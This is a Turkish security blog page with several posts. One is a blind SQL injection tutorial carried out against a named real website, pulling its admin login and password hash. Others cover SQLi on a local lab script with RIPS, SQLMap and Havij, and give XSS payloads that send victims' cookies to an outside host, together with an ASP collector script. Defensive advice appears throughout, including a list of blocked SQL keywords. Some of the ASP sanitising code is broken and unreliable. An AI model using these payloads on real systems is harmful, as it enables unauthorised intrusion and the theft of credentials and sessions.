Bir çok web yazılımcısı sql dilini kullanır, kullanmak zorundadır. Veritabanı ile en basitinden listeme, güncelleme, ekleme işlemleri yaparız. Fakat bu işlemleri yaparken kullandığımız web yazılım dili; sql dilini çok tehlikeli durumlara düşürebiliyor. Programlama dilinin tehlikelerinin yanında yazılımcının açık kapı bırakmasından dolayı da bu tür tehlikeler vardır.

Sql injection; sorgunun herhangi bir yerine eklenen karakterler ile fark edilir.

Örneğin:
http://www.site.com/konu.php?id=25 kısmında (25)’den sonra bir kesme işareti atarak, yani /konu.php?id=25’ yaparak belirtilen durumun true false döndürmesine bakılır. Blind SQL’de bizim için mühim olan sayfanın true ve false döndürmesidir. Blind SQL’i nasıl tespit ederiz diye sorarsanız ben bilinen en basit yöntem olan and sorgusu ile sayfanın true veya false olma durumunu denetlemeyi göstermek isterim.

True -> http://www.site.com/konu.php?id=25 and 1=1
False -> http://www.site.com/konu.php?id=25 and 1=2
Eğer ki, 1=1 eşit olduğunda sayfa sorunsuz geliyorsa ama 1=2  eşit olduğunda sayfada bazı verilerde eksilme vs varsa (veritabanından gelen verilerin gelmemesi gibi) Blind SQLi yakalamışız demektir. Şimdi php&mysql blind injection güvenlik zafiyeti olan bir yabancı web sitesi üzerinden örnek vererek uygulamalarımıza başlayalım.

~ NORMAL SQL INJECTION BİLİNDİĞİNİZ VARSAYILARAK YAZILMIŞTIR BU MAKALE ~

İlk başta şunu söyleyerek başlayayım; bu örnek web sitesinde mysql blind sql injection var fakat normal sql sorguları da yiyor yani ekrana veri yansıtıyor. Blind Sql Injection’da ekrana veri asla yansımaz! Biz doğru-yanlışa göre kendimiz veriyi inşa ederiz. Ben ilk önce normal sql sorguları uygulayarak sitenin admin bilgilerini aldım, sorgum bu şekilde;

http://www.bozar.be/activity.php?id=11214+and+1=2+union+select+version(),database(),user(),4,5,6,7,8,9,concat(login,0x3a,password),11,12,13,14,15,16,17+from+users--

Burada da görüldüğü gibi tablo adımız: users, sütun(kolon) adlarımız: login ve password. Ekran çıktısının resmini de ekleyeyim:


Burada admin yazan kısım; elde etmek istediğimiz yönetici(admin) bilgilerimizdir. İşte şifrede md5 olarak gelmiş.

Şimdi aynı urlde and 1=1 ve and 1=2’ye göz atalım. Yani artık testlerimizi blind injection kodları ile yapacağız:

BAŞLIYORUZ...

http://www.bozar.be/activity.php?id=11214 and 1=1 yapalım. Sayfa karşımıza normal olarak gelecektir.

http://www.bozar.be/activity.php?id=11214 and 1=2 yapalım. Sayfa 404.php’ye yönlendi. Yani bir değişim meydana geldi. Eğer and 1=1 yaptığımızda da 404.php’ye atsaydı bir şey yok diyip geçerdik fakat and 1=1 de normalken yanlış durumunda(and 1=2) sayfada yanlış oluyor. Yani blind sql kabak gibi ortada?

Şimdi mysql versionunu kontrol edelim dilerseniz.
http://www.bozar.be/activity.php?id=11214 and substring(version(),1,1)=4 yaptık sayfa true (doğru) döndü. Eğer 4 yerine 5 yazsaydık versiyon 5 olmadığı için 404.php ye atacaktı (deneyebilirsiniz). He bu arada Myql Versiyonu 4 :)

Şimdi select yani seçme komutunu kabul edip etmediğine bakalım.
http://www.bozar.be/activity.php?id=11214+and+(select 1)=1 sayfa yine true döndü sorun yok devam.

Şimdi daha demin tablomuzu users olarak bulduğumu söylemiştim tabloyu test edelim blind komutu ile;
http://www.bozar.be/activity.php?id=11214 and (select 1 from tablo limit 0,1)=1 şimdi tablo adını tablo olarak yaptım 404.php’ye atacak çünkü öyle bir tablo adı yok. Tablo kısmını users yapıp deneyelim sayfa sorunsuz gelecektir, bu da gösteriyor ki tablo adımız users.

http://www.bozar.be/activity.php?id=11214 and (select 1 from users limit 0,1)=1 true döndü devam.

Şimdi users tablosuna ait sütunları(kolon) test edelim;
http://www.bozar.be/activity.php?id=11214 and (select substring(concat(1,column),1,1) from users limit 0,1)=1
bu column yazan değeri değiştireceğiz bu şekilde girersek yine 404.php’ye atıcak çünkü column isimli bir sütun yok ki..

http://www.bozar.be/activity.php?id=11214 and (select substring(concat(1,login),1,1) from users limit 0,1)=1 yaptığımızda login isimli bir sütun olduğundan dolayı problemsiz olarak sayfa true dönecektir. Diğer columnuda password olarak buldum.

Devam edelim şimdi login ve password’u birleştirip 1.harf 2.harf 3.harf … diye giderek verileri çekmeye başlayalım.

Verileri birleştirme ve harf1’den başlama;
http://www.bozar.be/activity.php?id=11214 and ascii(substring((SELECT concat(column1,0x3a,column2) from tablo limit 0,1),1,1))>97

komutumuz bu burada tablo ve column bilgilerini yazıcaz. Bu 97 kısmı ne? derseniz ascii karakterleridir, harflerin sayı karşılığıdır.

www.asciitable.com adresinden bu karakterlere ayrıntılı şekilde göz atabilirsiniz. Ayrıca da blind injection için kullanılan kodları ve detaylarını google’da blind injection cheat sheet yazıp öğrenebilirsiniz.

http://www.bozar.be/activity.php?id=11214 and ascii(substring((SELECT concat(login,0x3a,password) from users limit 0,1),1,1))>96 sayfa düzgün geliyor, önemli olan sayfanın kopacağı yeri bulmak.. Yani false döneceği yeri. Fakat ondan önce bir şey açıklamak istiyorum.

Şimdi bu sayıları neye göre yazıyorsun? diyenler olabilir.

asciitable.com’da da görüldüğü gibi 0 ile 127 arasındaki tüm sayıları buraya yazabiliriz. Sayfa en önce hangi sayıda koparsa o veri bizim birinci harfimiz olacaktır. (Normal sql injection yöntemi gibi düşünebiliriz ki blind’e başlamadan önce normal sql injection konusunu bildiğinizi varsayıyorum)

http://www.bozar.be/activity.php?id=11214 and ascii(substring((SELECT concat(login,0x3a,password) from users limit 0,1),1,1))>97 yaptığımızda sayfa koptu, 96 da düzgündü 97 de gitti, yani 97 bizim ilk harfimizmiş. Hemen asciitable.com’dan bakıyoruz 97’nin karşılığı “a” yani daha demin başta resimde bilgilerin admin şeklinde olduğunu söylemiştim. Blind’de bize aynı sonucu veriyor.

2.Harf:
http://www.bozar.be/activity.php?id=11214 and ascii(substring((SELECT concat(login,0x3a,password) from users limit 0,1),2,1))>99 şimdi 2.harf için bu parantezler arasında 1,1 yazan yeri 2,1 olarak değiştiriyoruz.

2. harfin d olduğunu baştan biliyoruz zaten. asciitable de “d” nin karşılığı 100 onuda yazınca sayfa gidiyor zaten. 99 da düzgün, 100 de kopuyor. 2.harf d oluyor. böyle çoğaltarak gidiyoruz tek tek tüm harfleri alıyoruz. En son harfin bittiğini nasıl anlarız derseniz sayfa hiç kopmaz hep true döner 0 ile 127 arasında hep true dönüyorsa harf bitmiştir artık.

Sonuç olarak Blind SQL çok geniş bir kavramdır ve çok zahmetlidir. Ama çoğu büyük firmalarda dahil olmak üzere bu açığı barındırmaktadır ki şahsen büyük yerlerde de rastladım… Blind SQL’i diğer türlerden ayıran tek fark sorgu sonucunu sayfa tepkisi olarak yansıtmasıdır, yani doğru ve yanlış. Misal biz sorgumuzda açık kapı bırakıyoruz adamda ekleme yapıyor sorgumuza diyor ki:

select * from users where userid=1 diyor. userid’si 1 olan kişinin bilgilerini sayfaya çağırıyor true olarak geliyor. Biz de userid=2 yapıyoruz sayfa kopuyor bu normal bir tepki fakat eğer sorgumuzda yazım yanlışı yaparsak bu blind sql’e dönüşüyor. Php ve MySQL kullananlar için örnek bir sorgu vermek isterim;

<?php
$userid = (int)$_GET[“userid”];
$sorgu = mysql_query(“SELECT * FROM users WHERE userid=’$userid’”);
While($row = mysql_fetch_array($sorgu)){
Bilgiler şeklinde…
}
?>

Sorgularınızı bu tarz yazarsanız ve verinin integer olduğunu doğrularsanız açık kapı bırakmamış olursunuz!

---------------------------

Umarım sizin için hem saldırı hem güvenlik bazında faydalı bir döküman olmuştur, iyi çalışmalar 

Scriptlerde Açık Kapı Arama Sql Ve Xss Ağırlıklı

  • 27.1.2017 13:33:41
  • 0 Yorum
  • 1046

SQL Injection Nedir?

Web uygulamalarında birçok işlem için kullanıcıdan alınan veri ile dinamik SQL cümlecikleri oluşturulur. Örneğin; "SELECT * FROM Products" örnek SQL cümleciği basit şekilde veritabanından web uygulamasına tüm ürünleri döndürecektir. Bu SQL cümlecikleri oluşturulurken araya sıkıştırılan herhangi bir meta-karakter SQL Injection'a neden olabilir.

Öncelikle örnek olması açısından SQL Injection açığı barındıran bir betik ile başlayalım.
Betiğimizin görevi; üye id'sine göre veritabanından o id'ye sahip üyenin bilgilerini ekrana yazdırmaktadır.

sqli isimli bir veritabanı oluşturdum ve içinde uye isimli bir tablo mevcut. Tablonun da 4 adet sütunu var. Sütunlar: id, username, password, email
Son olarak da içine örnek birkaç adet veri girişi yaptım:

Betiğimizi oluşturan uye.php dosyasının kodları aşağıdaki gibidir:
<?php 
$baglan = mysql_pconnect("localhost","root","123456");    / veritabanına bağlanıyoruz
$baglan = mysql_select_db("sqli",$baglan);    / oluşturduğumuz veritabanımızı seçiyoruz
$id = $_GET["id"];
$sorgu = "SELECT * FROM uye WHERE id=".$id;

$cek = mysql_fetch_object(mysql_query($sorgu)); 
echo 'Olusan Sorgu: '.$sorgu."<br>";
echo $cek->username."<br>".$cek->email; 
?>
Bu betiği SQL Injection'a uğratan kod kısımlarını kırmızı renkle vurgulayarak gösterdim..
Böyle bir kod yazımı göstere göstere SQL Injection zafiyetine zemin oluşturmaktadır. Zafiyete neden olan id= query stringinin filtrelenmeden dinamik sql sorgusuyla birleştirilmesidir.

Manuel yolla ve genel olarak PHP scriptlerde SQL Injection zafiyetini yukarıdaki kod örneğindeki gibi tespitini yapabiliriz. Yani dinamik sorgu cümleciklerine ve hangi yöntemlerle sorgu çekildiklerine odaklanılmalıdır.
 
uye.php çalıştırıldığında görüldüğü gibi 1 id'sindeki bilgiler yani benim bilgilerim ekrana yazdırıldı:

Fakat zayıf bir kod yazım şekli kullandığımız için şimdi bunu SQL Injection saldırısına uğratalım, nasıl mı? id=1 ifadesinden sonra ' (tek tırnak) meta-karakterini kullanarak:


Sayfa Warning: mysql_fetch_object()... hatası verdi! Şimdi sıra geldi bunu sömürmeye yani exploit etmeye :) Veritabanından hassas veriyi sızdırıyoruz:

Görüldüğü gibi bilgiler ekrana yansıdı:
username: ismailsaygili
password: iso123

Aynı exploiting işlemini bir de otomatize araç olan SQLMap ile exploit edelim:

Script üzerinde manuel yöntemle SQL Injection zafiyetini keşfetmiştik, şimdi de otomatik olarak RIPS yazılımı aracılığıyla PHP scriptler üzerinde zafiyet araştırması yapalım. Bu arada RIPS; PHP için statik kodlarda zafiyet analizi yapan bir yazılımdır.

RIPS Kurulumu ve Kullanımı

RIPS hiç bir kurulum gerektirmez! Tak-Çalıştır mantığı :)
 
 

Öncelikle RIPS'i buradan indirelim. rips klasörünü localhost'unuza kopyalayın ve web tarayıcınızla ilgili URL'e gidin:


1. Adımda: Taramak istediğiniz PHP scriptin klasör yolu belirtilir. Ben yukarıda örneğini yaptığımız betiğin klasör yolunu yazdım, çünkü şuan onu tarayacağız.

2. Adımda: Zafiyet tipi seçilir. Ben SQL Injection zafiyetini seçtim.

3. Adımda: subdirs'i seçersek belirttiğiniz klasör yolunun alt klasörleri de taranacaktır.

4. Adımda: Son olarak scan butonuna basarak taramayı başlatıyoruz.

Ben taramamı yaptım ve sonuç bu şekilde:

Görüldüğü üzere RIPS, 7. satırda SQL Injection zafiyeti tespit etti. Yukarıda biz manuel denetim yaparken keşfettik hatırladınız mı? :)

Hocam zayıf kodu paylaştınız, peki bu kodun güvenli hali nasıl yazılır?
Güvenli Kod 1:
<?php

$baglan = mysql_pconnect("localhost","root","123456");
$baglan = mysql_select_db("sqli",$baglan); 
$id = (int) intval($_GET["id"]); // değişken tipi belirlenerek integer koruması sağlandı
$sorgu = "SELECT * FROM uye WHERE id=".$id;
$cek = mysql_fetch_object(mysql_query($sorgu)); 
echo 'Olusan Sorgu: '.$sorgu."<br>";
echo $cek->username."<br>".$cek->email;

?>
id değişkeninin tipini belirleyerek integer koruması sağlamış olduk. Yani saldırgan http://localhost/sqli/uye.php?id=1 URL'inden sonra tek tırnak meta-karakterini eklediğinde amacına ulaşamayacaktır çünkü id= query'sinden sonra sadece integer değerler kabul edilecektir. String yani karakter dizileri kabul edilemeyecektir.
Gördüğünüz gibi kullanıcı adı ve şifreyi veritabanından çekemiyoruz :(

SQL Injection'dan korunma tabi ki sadece bununla sınırlı değildir.. Örneğin id değişkeni mysql_real_escape_string fonksiyonu içine alınarak SQL sorguları için zararlı olabilecek karakterlerin başına \ ekler.

Diğer SQL Injection'dan Korunma Yöntemleri

  • Web uygulamalarında SQL Injection saldırısı yapmakta kullanılan komut ve karakterlerin geçişi engellenmelidir. Veri girişinin filtrelenmesi kadar veri çıkışının da incelenmesi web uygulamanın güvenliğini arttıracaktır.
  • Aşağıda belirtilen karakterlerin filtrelenmesi web uygulamanın SQL Injection ve olası diğer saldırılara karşı güvenliğini sağlayacaktır:
    • ['],[<],[>],[;],[/],[?],[=],[&],[#],[%],[{],[}],[|],[@],[\],[union],[exec],[select],[insert], [update],[delete],[drop],[sp],[xp],["]
  • Veritabanı Bağlantılarının Yetkilerinin Düşürülmesi
    • Web uygulamanın veritabanına bağlanıp kayıtları okurken ve yazarken kullandığı hesabın yetkilerinin minimumda tutulması olası SQL Injection saldırısının zararlarını azaltacaktır.
  • Hata Mesajlarının Engellenmesi
    • Saldırganların hata mesajlarından bilgi almasını engellemek için hata mesajlarının görüntülenmesini engellemek sistemi daha güvenli hale getirecektir.
  • SA Hesabının Korunması
    • MS SQL sunucu üzerinde bulunan SA hesabının güçlü bir şifreye sahip olması brute-force saldırına karşı sistemin güvenliğini arttırmak için gerekli etkenlerden biridir. Web uygulamalarının SA hesabı ile veritabanına bağlanmasını engellemeliyiz! Olası SQL Injection sonucu saldırganın SA yetkilerinde kod çalıştırabileceğini unutmayınız.
  • Kaynak Kodların Kontrol Edilmesi
    • Web uygulamalarının kaynak kodlarının olası saldırılara karşı denetlenmesi gerekmektedir. Özellikle kullanıcının veri girişine müsade edilen alanlar ve URL alanında yapılabilecek değişikliklere karşı filtrelemelerin uygulanmasını sağlamalıyız.
  • Veritabanındaki Kayıtların Şifrelenmesi
    • Özellikle kullanıcıların şifrelerinin tutulduğu alanların şifrelenerek veritabanına yazılması olası veritabanındaki bilgilere ulaşılması durumuna karşı ekstra güvenlik sağlayacaktır.
  • Yazılımsal veya donanımsal olarak Web Application Firewall (WAF) kullanımı

Pekiştirmek açısından bir örnek daha yapmak istiyorum.
PHP script olan TopGames v1.2 sürümünde daha önceden SQL Injection açığı keşfedilmiş (http://www.exploit-db.com/exploits/26405/).

Haydi bunun sağlamasını RIPS ile tarayarak yapalım.. sonuç ortada:

SQL Injection dışında bir de Cross-Site Scripting (XSS) zafiyeti keşfettik :)

play.php dosyasının 4. satırında SQL Injection zafiyeti ($_GET["gid"]) ve cat.php dosyasının 4. satırında ($_GET["id"]) XSS zafiyeti mevcutmuş.

SQL Injection zafiyetini bu seferde Havij ile exploit edelim:

Bir de bulduğumuz XSS zafiyetini test edelim:

Sonuç başarılı...

TopGames scriptinde bulduğumuz XSS zafiyetini Exploit-DB'ye mi bildirsek ne? :)

Wps Korumalı Routerlara İlişkin Şifrelemeler

  • 27.1.2017 12:45:46
  • 0 Yorum
  • 661

Wps nedir?
Yeni bir adsl modem aldınız diyelim eskisinden farklı olarak üzerindeki butonları kontrol ederken "Wps" adında bir butona denk gelebilirsiniz. Wps; wi-fi korumalı kurulum anlamına gelmektedir. WPS, özellikle ev kullanıcılarının kablosuz ağ güvenliğini kolayca sağlamaları için düşünülmüş bir standarttır.
Wps bağlantı yöntemleri nelerdir?
WPS'te iki bağlantı yöntemi vardır. Bunlar:
1- Birincisi PIN yöntemidir. PIN yönteminde WPS destekli aygıtların yazılımlarından ya da üstlerindeki bir etiketten okunacak bir PIN numarası, WPS anlaşmasını gerçekleştirecek aygıttaki uygun yere yazılır. Bu anlaşmayı gerçekleştirecek aygıt genellikle kablosuz ağ erişim noktasıdır.
2- İkinci yöntemde bir düğme devreye girer. Önce cihaz üzerinde WPS yazan düğmeye basarsınız. marka ve modele göre bu düğmeye birkaç saniye basılı tutmanız gerekebilir. Bundan sonra belli bir süre içerisinde erişim noktasına bağlamaya çalıştığınız aygıttaki aynı yine Wps yazan düğmeye basarsınız. Aygıtta fiziksel bir düğme yoksa cihazın yönetim panelinden bu işlemi yapabilirsiniz.

Cros Site Scripting (XSS) Açıklarından Kurtulmak İçin En İdeal Yol

  • 26.1.2017 14:05:14
  • 0 Yorum
  • 470

XSS Açıkları Request ile kullanıcıdan alınan verilerin sayfa içinde Yazdırılması ile oluşur. Örneğin QueryString ile alınan sayfa numaraları yada ilgili kaydı gösteren id değişkenleri.

hedefsite/Default.Asp?Page=1 yada
hedefsite/Product.Asp?id=1
hedefsite/Default.Asp?Kategori=Haber gibi.

Örnek XSS Açığı ile Ne yapılabilir :

Yukardaki örnekler gibi açığımızı buluyoruz yada hedef sitede Webservis sayaç kodunun olması yeterli.
Açığımızı bulduktan sonra kullanıcının Cookie'sini JavaScript (document.cookie) ile okuyup istediğimiz bir adresteki veri tabanına kayıt ediyoruz yada kendimize mail atıyoruz.

-------------------------
hedefsite.com/Default.Asp?Page=2"><SCRIPT>location.href='http://www.cyber-warrior.org/yakala.asp?X='+escape(document.cookie)</SCRIPT>
-------------------------

Saldırgan Url’nin sonuna "> Eklentisi ile Inputların sonlandırılmasını ve bundan sonra eklenen zararlı kodları Explorer’ın icra etmesini sağlar.

Bu Link’e tıklayan kullanıcının Cookie’si Belirtilen Kaynağa Post edilir.

Yada : Hedef sitede yazdığınız mesajı gösterebilecek uygulamalar var ise ziyaretçi defteri, forum vb. uygulama
----------------------------
<script>document.location='http://www.cyber-warrior.org/yakala.asp?X=' +document.cookie</script>
----------------------------
Bu kod ilgili sayfada görüntülendiği anda sayfayı görüntüleyen kullanıcıların cookielerini alarak yakala.asp dosyasına veri tabanına kaydetmesi için gönderir.

Web Sayfanızda XSS açıkları kapatılmış Olsada, Webservis Sayac kodu var ise bu sayesinde XSS Açığı Oluşuyor.
WebServis Tarafından verilen ve Sitenize eklediğiniz;

------------------------------------
<script language="javascript"> var wuser="CWDoktoray", wbanner=11;</script>
<script language="javascript" src= "a target=_blank href=http://www.webservis.gen">http://www.webservis.gen.tr/sayac.js"></script>
-------------------------------------

XSS Açıklarını Engellemek için:

Request ile alınan değerleri her zaman QueryString’de olsa Replace ile Aşağıdaki şekilde temizleyin

Ve Request verilerini alırken mutlaka tam sayıya çevirin

Recid = CInt(Trim(Server.HTMLEncode("Recid")))

Recid = Replace(Recid, "<" , "<") ’küçüktür
Recid = Replace(Recid, ">" , ">") ’büyüktür
Recid = Replace(Recide, "’" , "’") ’tek tırnak
Recid = Replace(Recid, Chr(10) , "") ’Satır Başı
Recid = Replace(Recid, Chr(34) , "") ’çift tırnak

---------------------------------------------------

ASP.NET ’de

web.config Dosyasında aşağıdaki değişikleri yaptığınızda " ’ "

gibi karakterleri sistem kendisi kontrol eder. Bu Sayede hemen hemen hiçbir XSS ve SQL Enjeksiyon teknikleri Etkili olmaz

<System.Web>
<Pages validateRequest="True"></Pages>
</System.Web>

IPS Kullanıyor iseniz

Yeni imza yaratıp

Application Layer / HTTP / HTTP.URL_DECODED
Protokolüne;

’ Tek Tırnak,
" Çift Tırnak
< Küçük
> Büyük

Karakterlerini ekleyerek XSS ve SQL Enjeksiyon Saldırılarını Direkt Engelleyebilirsiniz...

----------------------------------------------------------------------------------

Yakala.ASP’den Gelen Verileri yakalamak ve Veritabanına kaydetmek için

Örnek Basit bir ASP Dosyası

X = Request.QueryString("X") Yerine
Veri URL’den geleceği için
X = Request.ServerVariables("HTTP_REFERER") de Kullanabilirsiniz.

"Yakala.mdb" adında bir database oluşturun "tblYakala" adında bir tablo ve "Sayfa" Adında (alan tipi Not) Oalcak şekilde Tasarlayın

--------------------Yakala.Asp-----------------------------------

<%
Dim X
X = Request.QueryString("X")
%>

<%
Dim ConnString,bag
ConnString = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & server.mappath("Yakala.mdb") & ";"
set bag = Server.CreateObject("ADODB.Connection")
bag.Open ConnString
%>

<%
Dim SQL,Rs
Set Rs=Server.CreateObject("ADODB.Recordset")
SQL="Select * From tblYakala"
Rs.Open SQL,ConnString,1,3
End iF
%>

<%
Rs.AddNew
Rs("Sayfa")=X
Rs.Update
Rs.Close
%>

SSL İle Web Site Güvenliğinizi Bir Adım Öteye Taşıyın

  • 26.1.2017 12:44:15
  • 0 Yorum
  • 400

Müşterilerinizle İnternet üzerinden iş yaparken, bir noktada (örneğin bülteninize abone olduklarında veya sipariş verdiklerinde) müşterilerinizin bilgilerini sormanız gerekebilir. Web tarayıcısı ile web sunucusu arasında gidip gelen verileri şifreleyen "SSL" (Secure Sockets Layer - Güvenli Yuva Katmanı) adlı teknoloji, müşterilerinizin bilgilerini korumanıza yardımcı olabilir. SSL ile güvenliği sağlanan web adresleri http: yerine https: ile başlar. Bu nedenle bazen SSL'den "HTTPS" olarak bahsedilir. AdWords, belirli kişisel ve mali bilgileri toplarken, web sayfalarınızda SSL bağlantılarını kullanmanızı gerektirir.

SSL'nin Yararları
SSL kullanmak, şifrelenmemiş bir web bağlantısına göre daha fazla gizlilik ve güvenlik sağlar. Bilgilerin üçüncü taraflarca ele geçirilmesi ve kötüye kullanılması riskini azaltır. Birçok site ziyaretçisi, SSL bağlantısı kullandıklarını bildiklerinde ödeme bilgileri ve diğer kişisel bilgilerini paylaşırken daha güvende hissedebilir.

Web sayfalarında SSL olup olmadığını kontrol etme

Bir SSL bağlantısı kurulduğunda web tarayıcılarının çoğunda bir kilit simgesi görünür. 

SSL'yi kontrol etmenin en doğrudan yolu web adresini, başına https:// ekleyerek tarayıcınıza girmektir, örneğin https://adwords.google.com. Tarayıcınızda bir kilit simgesi görürseniz, bağlantılarınızın güvenli olduğunu onaylamak üzere ek bilgi için bu simgeyi tıklayın. Kilit simgesi yoksa, sayfa SSL ile güven altına alınmamıştır.

SSL teknolojisinin birçok web sitesi tarafından yalnızca şifre veya kredi kartı numarası gibi hassas bilgilerin aktarıldığı belirli sayfalarda kullanıldığını unutmayın.

Web sitenize SSL kurma
SSL'nizin olmaması ve SSL'yi web sitenizdeki bir veya daha çok sayfa için uygulamanızın gerekmesi halinde izleyeceğiniz temel adımlar aşağıda belirtilmiştir:

Web siteniz için bir SSL sertifikası edinin. SSL sertifikası, işletme kimliğinizi doğrulayan ve bir web sunucusun, ziyaretçilerin web tarayıcısıyla güvenli şifreleme gerçekleştirmesine olanak tanıyan elektronik bir belgedir. Web sitesi barındırmada olduğu gibi, birçok SSL sertifikası sağlayıcısı ve seçeneği mevcuttur. Mevcut web sitesi barındırıcınızla, sundukları SSL sertifikalarının hangileri olduğu ve sertifika yüklemede yardımcı olup olmadıkları konusunda görüşmeniz yararlı olacaktır. Genellikle web sitesi barındırıcıları tarafından sunulan en ekonomik seçenek "paylaşılan sertifika" olarak adlandırılır. Paylaşılan sertifika kullanmak, AdWords SSL politikası gereksinimlerini yerine getirmek açısından yeterlidir.
SSL sertifikasını web sunucunuza yükleyin. Yükleme yöntemi, web sunucunuza ve satın aldığınız sertifikanın türüne göre farklılık gösterir. Özel yükleme talimatları, kaynaklar ve destek, normalde sertifika sağlayıcınız veya web sitesi barındırıcınız tarafından sağlanır.
SSL ile güvenliğini sağlamak istediğiniz web sayfalarını belirleyin. En güvenli web siteleri sitenin tamamında SSL kullanır. Bununla birlikte, AdWords politikası, güvenli bağlantıları yalnızca kişisel giriş şifreleri, iletişim ayrıntıları veya banka hesap numaraları gibi belirli kişisel ve mali bilgilerin toplandığı veya aktarıldığı sayfalarda kullanmanızı gerektirir.
Güvenli şekilde yüklemek istediğiniz sayfalara (ve sayfa öğelerine) giden bağlantıları düzenleyin. Güvenli şekilde yüklenmesini istediğiniz sayfalar için, bu sayfalara giden bağlantıların başındaki http:// ifadesini https:// olarak değiştirin. Örneğin, http://checkout.google.com/login.htm sayfasını güvenli hale getirmek istiyorsanız, web sitenizde bu sayfaya giden tüm bağlantıları https://checkout.google.com/login.htm olarak değiştirmeniz gerekir. Ayrıca http://checkout.google.com/login.htm gibi güvenli olmayan bir sayfayı ziyaret etmeye çalışan kişileri https://checkout.google.com/login.htm gibi güvenli bir bağlantıya otomatik olarak yönlendiren sunucu yeniden yönlendirmeleri ayarlayabilirsiniz.
Sayfalarınızın güvenli olup olmadığını doğrulamak için test uygulayın. Sitenizin ziyaretçilerinin kullanıyor olabileceği en az iki farklı modern tarayıcıyla yeni güvenli sayfalarınızın tümünü ziyaret etmeyi deneyin. Tarayıcınızda bir kilit simgesi görürseniz, bağlantılarınızın güvenli olduğunu onaylamak üzere ek bilgi için bu simgeyi tıklayın. En yaygın hatalardan biri, https: sayfalarında "karma içerik" bulunmasıdır. Bu, bir veya daha çok öğenin (genellikle resimler, flash dosyaları veya CSS dosyaları) güvenli olmayan bir http:// URL'si kullanılarak bir https: sayfasına yüklendiği anlamına gelir. Çoğu modern tarayıcı karışık içerikli sayfalarda güvenli olmayan kaynakları Javascript konsollarında listeler (bu konsol bazı tarayıcılarda "Javascript hata ayıklayıcı" olarak adlandırılabilir). Bu sorunları gidermek için, sayfanın HTML kodunu inceleyin ve aşağıdakileri yapın:
http:// ifadesini aratın.
Tüm geçtiği yerleri // ile değiştirin.
Değişiklikleri web sunucunuza kaydedin ve tekrar test etmeyi deneyin.
Sayfada karma içerik uyarıları almaya devam ederseniz, bu büyük olasılıkla Javascript veya flash kodunuzdaki sorunlardan kaynaklanmaktadır.

SSL'nin maliyeti
SSL hizmetlerinin ücretleri değişiklik gösterir. 1 Mart 2012 tarihinden itibaren, birçok SSL sertifika sağlayıcısı 300 TL'den daha düşük fiyatlarla yıllık sertifikalar sunmaya başlamıştır. Çoğu web ve e-ticaret konağı, web barındırma hizmetlerinin parçası olarak ek ücretler olmadan temel SSL hizmetleri sunar.

WEB SİTELERİNİZİN GÜVENL,İK TEHDİTLERİNİ ORTADAN KALDIRIN

  • 26.1.2017 12:15:47
  • 0 Yorum
  • 460

Aşina olmadığınız kötü niyetli dosyaları (malicious files) kaldırın.

Bir çok PHP uygulaması kurulum sırasında alışkın olmadığınız dosyaları oluşturabilir. Sunucu üzerinde oluşturulan ve şüpheli izlenimi veren bu dosyaların takibinin yapılması önemlidir.

>> Joomla, word press gibi içerik yönetim sistemi uygulamalarınızı en yeni versiyonlarına yükselterek güncel tutun.

Eski CMS’nizdeki (içerik yönetim sistemi) güvenlik açıklarınızı kullanmış olduğunuz web uygulamasının yeni sürümlerine yükselterek giderebilirsiniz. Özellikle word press ve joomla web sitelerine yapılan hack saldırılarında
kullanılan yazılımın güncel olmamasından faydalanıldığını çokça görmekteyiz. Örneğin eski kodlar bulunduran joomla veya wordpress ile tasalanmış bir web sitenizin yönetim panelinine, tarayıcınızın adres çubuğuna yazılan küçük bir kod ile rahatlıkla girilebilmektedir. Joomla ve wordpress güncellemelerini yönetim paneliniz üzerinden takip edip yükleyebileceğiniz gibi ayrıca bu yazılımların kendi resmi web siteleri üzerinden de takip edebilirsiniz. Kullanmış olduğunuz sistemi geliştirenlerin güvenlik ile ilgili duyurularını da sosyal medya üzerinden, varsa mail listelerine üye olarak veya destek forumlarından takip edebilirsiniz.

>> Kullanılan tüm eklentileri, scriptleri en yeni versiyonlarına yükselterek güncel tutun.

Web uygulamalarınızın (wordpress, joomla vb.) güncellenmesi, içeriğindeki eklentilerin de güncellenmesi anlamına gelmez. Wordpress, Joomla, Drupal vb. popüler uygulama eklentileri özel uygulama versiyonlarına göre oluşturulurlar. Bu sebeple uygulamalarınızı güncellerken kurulu olan eklentilerinizin güncel sürüm ile çalışabilirlik garantisi olduğundan emin olun. Ayrıca her bir eklentinin resmi web sitesi üzerinden veya güvenlik duruyuları listesine abone olarak en son eklenti sürümlerini takip edin.

>> Şifrelerinizi değiştirin ve kullanılmayan web sitelerinizi FTP üzerinden silin.

Özellikle FTP istemcinizde hatırlatma özelliği açık olan hesap şifreleriniz çerezlerden çalınabilmektedir. Bu yüzden bu özelliği kullanmak yerine her defasında şifrelerinizi manuel olarak girin. cPanel üzerinden hosting şifrenizi ve joomla, wordpress gibi yönetim panelli bir site kullanıyorsanız yönetici panel şifrenizi karmaşık bir şifre ile değiştirin. (Büyük, küçük harf, rakam, ünlem gibi karmaşık bir şifre kullanın.) Veritabanı kullanıcısı şifresini de zor bir şifre ile değiştirin. Zira ele geçirilen basit bir veritabanı şifresi ve kullanıcı adı ile önce mysql veritabanına bağlanılıp daha sonra admin panel şifreniz değiştirilerek FTP dizinine upload yapılabilir.

>> Kullanımda olmayan veritabanı ve web uygulamalarını hesabınızdan silin.

Hesabınıza yüklenen her bir veritabanı ve web uygulaması saldırganlar için muhtemel giriş noktasıdır. Örneğin şifreleri ele geçirilen bir veritabanı üzerinden tüm web sitelerinize müdahale edilebilir.
Uzun zamandır kullanılmayan dolayısiyle güncel olmayan ve potansiyel tehlike teşkil eden bu yazılımları kaldırarak riski azaltın.

>> Risk oluşturan yazma izinlerini düzeltin.

Web site dosyalarınızın normalde olması gereken yazma izni 644 ve klasörlerinizin de olması gereken yazma izni 755’tir. İzinleri FTP istemciniz üzerinden veya cPanel dosya yöneticisi ekranının üstündeki izinleri değiştir sigesine (Change Permissions) tıklayarak ayarlayabilirsiniz.

>> Konfigürasyon dosyalarınızı gizleyin

Veritabanı bilgilerinizi içeren bu dosyalarınızın içeriğini decode ederek gizli kodlara dönüştürebilir veya dosya yolunu değiştirerek saldırganları şaşırtabilirsiniz. (Bu işlem için özel bir eklenti kullanmanız gerekir.)

>> php.ini dosyanızı gözden geçirin. (gerekirse yapılandırın)

